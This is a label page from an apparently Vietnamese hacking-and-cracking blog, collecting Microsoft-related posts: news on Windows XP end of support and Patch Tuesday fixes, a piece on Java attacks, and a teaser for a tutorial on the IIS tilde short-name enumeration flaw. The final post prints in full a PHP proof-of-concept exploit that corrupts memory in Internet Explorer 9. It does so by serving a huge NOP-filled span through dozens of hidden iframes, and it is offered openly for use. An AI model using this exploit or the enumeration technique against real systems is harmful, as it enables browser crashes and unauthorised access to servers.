Tài Liệu Hack + Crack: Microsoft

Hiển thị các bài đăng có nhãn Microsoft. Hiển thị tất cả bài đăng

Thứ Hai, 26 tháng 5, 2014

Thủ thuật để có thể tiếp tục cập nhật bảo mật cho Windows XP

Microsoft đã chính thức ngừng hỗ trợ cho Windows XP trước ngày 08/04/2014. Điều này để buộc một số lượng lớn người sử dụng chuyển sang phiên bản mới nhất của Windows, nhưng vẫn còn một phần lớn người dùng đang sử dụng hệ điều hành Microsoft lâu đời và phổ biến nhất mặc dù không được cập nhật bảo mật.

Trong khi một số công ty và các tổ chức không thể chuyển hệ điều hành đang chạy Windows XP sang một hệ điều hành khác trước khi giai đoạn hỗ trợ kết thúc vẫn nhận được cập nhật bằng cách trả phí Microsoft cho các bản vá bảo mật và cập nhật.

Microsoft finally fixes critical Internet Explorer vulnerability

Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.

(Credit: Microsoft)

In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.

Over 20 security holes found in Windows, IE and other software. Patch now

Microsoft has released its regular “Patch Tuesday” bundle of security patches for Windows and its other software, protecting against a number of critical vulnerabilities.

Some of the security holes are classified as “critical”, meaning that malware or malicious hackers could exploit them to compromise a computer without any interaction by the user.

The most serious fix of the bunch is the MS13-059 cumulative patch for Internet Explorer.

READ MORE »

Thứ Sáu, 1 tháng 3, 2013

Vì sao Java vẫn không bị khai tử mặc dù liên tục bị hack?

Thời gian gần đây, một loạt các công ty lớn hàng đầu trên thế giới như Facebook, Apple và mới nhất là Microsoft, lần lượt trở thành nạn nhân của các hacker (nhiều nghi vấn là các hacker đến từ Trung Quốc).

Hệ thống máy tính của những ông lớn này đều bị hacker thâm nhập chủ yếu thông qua một con đường là Java. Và không chỉ mới đây mà trong quá khứ, rất nhiều cuộc tấn công của hacker đều nhằm vào Java trên máy tính người dùng.

[TUT] - Khai thác lỗi Microsoft IIS tilde character ~

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

READ MORE »

Thứ Ba, 27 tháng 11, 2012

Internet Explorer 9 Memory Corruption PoC Exploit

<?php

/**********************************************************
*   Internet Explorer 9 Memory Corruption PoC Exploit    *
**********************************************************
*                                                        *
* Successfully executed with IE9 version 9.0.8112.16421  *
*                                                        *
* Discovered by Jean Pascal Pereira <pereira@secbiz.de>  *
*                                                        *
**********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M');

if(!file_exists("junk.htm"))
{
  $string = "<span id='";
  
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
  
  file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
  print "<iframe style='display:none' src='junk.htm'>\n";
}

/* http://0xffe4.org */

?>

Tài Liệu Hack + Crack